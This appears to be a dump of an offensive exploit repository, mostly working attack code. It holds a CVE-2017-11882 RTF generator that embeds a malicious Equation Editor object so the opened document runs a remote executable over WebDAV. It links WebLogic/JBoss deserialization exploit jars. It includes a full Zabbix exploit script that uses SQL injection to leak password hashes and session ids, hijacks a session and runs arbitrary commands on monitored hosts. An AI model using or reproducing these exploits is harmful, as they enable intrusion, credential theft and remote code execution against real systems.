ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 55 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 56 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 57 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 58 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 59 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 60 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 61 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 62 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 63 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 64 | 
0000000000000000000000000000000000000000000000000000001400000000000000010043006f 65 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 66 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 67 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000 68 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 69 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff 70 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 71 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 80 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 81 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 82 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 83 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 84 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 85 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 86 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 87 | 
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 88 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004 89 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 90 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 91 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 92 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 93 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 94 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 95 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 96 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075 97 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 98 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 99 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 100 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 101 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff 102 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 104 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff 105 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 106 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 107 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 108 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 109 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 110 | 
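45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""


# Offset (in hex characters; byte 0x949) of the font-name slot inside
# OBJDATA_TEMPLATE where the command text is spliced in.
COMMAND_OFFSET = 0x949*2

# Largest command that fits the slot.  In OBJDATA_TEMPLATE the slot is the
# run of 0x41 padding that ends right before the `120c4300` word (presumably
# the fixed address the overflow lands on); a longer command is spliced over
# that word and the primitive stops working.  The original code compared
# against 999 while its message said 43, so over-long commands were written
# out silently as a broken payload.
MAX_COMMAND_LEN = 43


def create_ole_exec_primitive(command):
    """Return one OLE object whose Equation stream runs *command*.

    *command* (a Python 2 ``str``) is hex-encoded and spliced into
    OBJDATA_TEMPLATE at COMMAND_OFFSET, replacing exactly as many hex
    characters as it occupies.  Slot bytes it does not cover keep their 0x41
    padding, which is why callers end commands with " &" so the padding is
    parsed as a separate (failing) command.  The stream is then wrapped in
    OBJECT_HEADER / OBJECT_TRAILER, both defined earlier in this file.

    Raises ValueError when the command is longer than MAX_COMMAND_LEN bytes.
    """
    if len(command) > MAX_COMMAND_LEN:
        raise ValueError("primitive command must be at most %d bytes (got %d)"
                         % (MAX_COMMAND_LEN, len(command)))
    hex_command = command.encode("hex")  # Python 2 str -> hex text
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    ole_data = (objdata_hex_stream[:COMMAND_OFFSET]
                + hex_command
                + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):])
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER


def create_rtf(header, trailer, remote_location, remote_file):
    """Assemble the RTF document: *header*, four OLE objects, *trailer*.

    The first object runs ``cmd.exe /c start <remote_location>`` so the
    WebClient service is started and the WebDAV location opened; the next
    three all run *remote_file* (repeated because the service may still be
    starting when the first one fires).

    Both strings must fit the command slot of create_ole_exec_primitive():
    *remote_location* may be at most 24 bytes (43 minus the 17-byte
    ``cmd.exe /c start `` prefix and the 2-byte `` &`` suffix) and
    *remote_file* at most 41 bytes; otherwise ValueError propagates.
    """
    ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
    ole2 = create_ole_exec_primitive(remote_file + " &")
    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + ole2 + ole2 + ole2 + trailer


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-u", "--url", help="Remote location to trigger WebClient service", required=True)
    parser.add_argument("-e", "--executable", help="Remote executable in WebDAV path", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

    args = parser.parse_args()

    try:
        rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
    except ValueError as err:
        raise SystemExit("[-] %s: --url may be at most 24 bytes and --executable at most 41" % err)

    # `with` closes (and therefore flushes) the document before we report success.
    with open(args.output, "w") as output_file:
        output_file.write(rtf_content)

    print("!!! Completed !!!")
--------------------------------------------------------------------------------
/weblogicANDjbossTool/DeserializeExploit.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/DeserializeExploit.jar
--------------------------------------------------------------------------------
/weblogicANDjbossTool/JBOSS_EXP.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/JBOSS_EXP.jar
--------------------------------------------------------------------------------
/weblogicANDjbossTool/WebLogicExploit.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/WebLogicExploit.jar
--------------------------------------------------------------------------------
/weblogicANDjbossTool/WebLogic_EXP.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/weblogicANDjbossTool/WebLogic_EXP.jar
--------------------------------------------------------------------------------
/zabbixPwn.py: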
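#!/usr/bin/env python
#coder:mickey

'''
Zabbix 2.x - 3.x frontend exploit chain (MySQL-backed targets only):

  1. Unauthenticated error-based SQL injection through the ``profileIdx2``
     parameter of ``jsrpc.php`` (``screen.get`` / ``showlatest``).  Values are
     leaked inside MySQL's "Duplicate entry" error text, so the backend must be
     MySQL/MariaDB and the frontend must echo database errors to the client.
     This matches the jsrpc.php profileIdx2 injection publicly tracked as
     CVE-2016-10134 -- confirm against the target's version banner.
  2. A session id is read from the ``sessions`` table and validated by
     fetching ``proxies.php`` with it as the ``zbx_sessionid`` cookie.
  3. The hijacked session is used as the JSON-RPC ``auth`` token to overwrite
     script id 1 with an attacker command (``script.update``) and run it on a
     chosen host (``script.execute``).

WARNING: step 3 permanently replaces the command of script id 1 on the target
and this tool does not restore it.  TLS verification is disabled on purpose
(``verify=False``) so self-signed lab targets can be reached.  Use only
against systems you are authorised to test.

Tcpdump Debug: tcpdump -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
'''

import re
import sys
import argparse
import urllib2  # no longer used (the urlopen path was replaced by requests); kept as-is
import json
import readline  # side effect only: line editing / history for raw_input()
try:
    import requests
except Exception as e:
    sys.exit("\x1b[1;31m {-} This Exp need requests,please try 'pip install requests'\x1b[0m")

# Seconds to wait on each HTTP exchange so a hung target cannot hang the tool
# (the original commented-out urlopen call used the same value).
TIMEOUT = 10

# Browser-like User-Agent sent with every request.  api_jsonrpc_exec() adds a
# Content-Type entry to this same dict before talking to the JSON-RPC API.
ugent = {'user-agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'}

# Error-based extraction wrapper.  ``%s`` receives a scalar SELECT (without
# outer parentheses); its value comes back to the client inside MySQL's
# duplicate-key error as ``Duplicate entry '~<value>~1'``.  The
# floor(rand(0)*2) / GROUP BY collision is MySQL-specific.
_ERROR_BASED_QUERY = (
    "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(%s),0x7e))) "
    "from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)"
)

# Pulls the leaked value out of the echoed MySQL error text.
_LEAK_RE = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")


def _error_based_query(scalar_select):
    """Wrap *scalar_select* (e.g. ``select version()``) in the extraction template."""
    return _ERROR_BASED_QUERY % scalar_select


def _extract_leaked_value(text):
    """Return the first value leaked through a duplicate-entry error in *text*, or None."""
    match = _LEAK_RE.search(text)
    return match.group(1) if match else None


def banner():
    """Print the tool banner (side effect only; returns None)."""
    print("""\x1b[1;32m
 _____ _ _ _ ____
 |__ / __ _ | |__ | |__ (_)__ __| _ \ __ __ _ __
 / / / _` || '_ \ | '_ \ | |\ \/ /| |_) |\ \ /\ / /| '_ \ 
 / /_| (_| || |_) || |_) || | > < | __/ \ V V / | | | |
 /____|\__,_||_.__/ |_.__/ |_|/_/\_\|_| \_/\_/ |_| |_|

 Exploit for Zabbix 2.x - 3.x, coder by mickey: \x1b[0m""")


def sql_injection(sql):
    """Inject *sql* through the profileIdx2 parameter of jsrpc.php.

    *sql* must be a complete error-based subquery (see _error_based_query()).
    Returns the leaked value, or None when the response carries no MySQL
    duplicate-entry error (patched target, non-MySQL backend, or DB errors
    not shown).  Reads the module-global ``url`` set in __main__ and exits
    the process on a transport error.
    """
    data = {
        'type': 9,
        'method': 'screen.get',
        'profileIdx': 1,
        'updateProfile': 1,
        'mode': 2,
        'screenid': '',
        'groupid': '',
        'hostid': 0,
        'pageFile': 1,
        'action': 'showlatest',
        'filter': '',
        'filter_task': '',
        'mark_color': 1,
        'resourcetype': 16,
        'profileIdx2': sql,  # the injectable parameter
    }
    try:
        response = requests.post(url + 'jsrpc.php', data=data, headers=ugent,
                                 verify=False, timeout=TIMEOUT)
    except Exception as msg:
        sys.exit("\x1b[1;31m{-} %s\x1b[0m" % (str(msg)))
    return _extract_leaked_value(response.text)


def check_version():
    """Return the line containing the frontend's Copyright/version text, or False.

    ``url`` already ends with '/', so the path is joined without an extra
    slash (the original produced ``//httpmon.php``).
    """
    req = requests.get(url + 'httpmon.php', headers=ugent, verify=False, timeout=TIMEOUT)
    version = re.findall('(.*?Copyright.*?)<', req.text)
    return version[0] if version else False


def check_sessionID(sessid):
    """Validate a hijacked session id by fetching proxies.php with it.

    Returns *sessid* when the page is served without "Access denied."; exits
    otherwise, including when extraction yielded no session id at all.  Note
    this only proves the session may view proxies.php -- it does not prove
    the session belongs to a super-admin.
    """
    if not sessid:
        sys.exit("\x1b[1;31m{-} could not extract a zbx_sessionid from the sessions table\x1b[0m")
    req = requests.get(url + 'proxies.php', headers=ugent,
                       cookies={'zbx_sessionid': sessid}, verify=False, timeout=TIMEOUT)
    if 'Access denied.' in req.text:
        sys.exit("\x1b[1;31m{-} zbx_sessionid(%s) is check Error \x1b[0m" % sessid)
    return sessid


def script_exec():
    """Unimplemented placeholder kept for interface compatibility."""
    pass


def _rpc(method, params, authsession, req_id):
    """POST one JSON-RPC call to api_jsonrpc.php and return the decoded reply.

    The reply is returned as-is so callers can inspect ``error`` (e.g. a
    rejected auth token or a script not permitted on the host) instead of
    crashing on a missing ``result`` key.  ``verify=False`` matches the other
    requests in this file; the original API calls omitted it and failed on
    self-signed HTTPS targets.
    """
    payload = {
        'jsonrpc': '2.0',
        'method': method,
        'params': params,
        'auth': authsession,
        'id': req_id,
    }
    resp = requests.post(url + 'api_jsonrpc.php', data=json.dumps(payload),
                         headers=ugent, verify=False, timeout=TIMEOUT)
    return resp.json()


def api_jsonrpc_exec(authsession):
    """Interactive command loop over the JSON-RPC API using *authsession* as auth token.

    Lists hosts, asks for a hostid, then for every command typed rewrites
    script id 1 (``script.update``) and runs it on that host
    (``script.execute``), printing the returned value.  "quit"/"exit" ends the
    loop.  Script id 1 is left holding the last command.
    """
    ugent['Content-Type'] = 'application/json'

    # step1: get hostid
    hosts = _rpc('host.get', {'output': ["hostid", "name"], 'filter': {'host': ''}}, authsession, 1)
    if 'error' in hosts:
        sys.exit("\x1b[1;31m{-} host.get failed: %s\x1b[0m" % json.dumps(hosts['error']))
    print("\x1b[1;32m{+} HostUID : HostName \x1b[0m")
    for hid in hosts['result']:
        print("\x1b[1;32m %s : %s \x1b[0m" % (hid['hostid'], hid['name']))

    # step2: update && execute
    hostid = raw_input('\033[41m[input_hostid]>>: \033[0m ')

    while True:
        cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
        if cmd == "":
            print("Result of last comaand:")
        if cmd.lower() in ("quit", "exit"):
            break

        upd = _rpc('script.update', {'scriptid': '1', 'command': cmd}, authsession, 0)
        if 'error' in upd:
            print("\x1b[1;31m{-} script.update failed: %s\x1b[0m" % json.dumps(upd['error']))
            continue

        exe = _rpc('script.execute', {'scriptid': '1', 'hostid': hostid}, authsession, 0)
        if 'error' in exe:
            print("\x1b[1;31m{-} script.execute failed: %s\x1b[0m" % json.dumps(exe['error']))
            continue
        print(exe["result"]["value"])


if __name__ == "__main__":
    banner()  # the original passed banner() as the argparse description, i.e. printed it here
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', action="store", dest="url", type=str, required=True)
    given_args = parser.parse_args()
    url = given_args.url
    if not url.endswith('/'):
        url += '/'

    print("")
    db_version = sql_injection(_error_based_query("select version()"))
    if db_version is None:
        # Nothing leaked: stop here instead of printing "None" and hijacking nothing.
        sys.exit("\x1b[1;31m{-} no MySQL error leaked via jsrpc.php profileIdx2 - target is probably patched, not MySQL-backed, or hides DB errors\x1b[0m")
    print("\x1b[1;32m{+} MYSQL Version : %s\x1b[0m" % db_version)
    print("\x1b[1;32m{+} MYSQL User : %s\x1b[0m" % sql_injection(_error_based_query("select user()")))

    zbx_version = check_version()
    if zbx_version:
        print("\x1b[1;32m{+} Zabbix Version : %s\x1b[0m" % zbx_version)

    # `passwd` is the stored frontend password hash; the original author labels
    # it md5 -- verify the hash format for the target's release before cracking.
    print("\x1b[1;32m{+} Zabbix Account : %s (md5)\x1b[0m"
          % sql_injection(_error_based_query("select concat(name,0x3a,passwd) from users limit 0,1")))

    # Only the first row of `sessions` is tried.  If it is stale or lacks
    # permission, bump the offset (limit 1,1 / limit 2,1 / ...) and rerun.
    checkid = sql_injection(_error_based_query("select sessionid from sessions limit 0,1"))
    if check_sessionID(checkid):
        print("\x1b[1;32m{+} Zabbix SessionID : %s (check OK) \x1b[0m" % checkid)
        api_jsonrpc_exec(checkid)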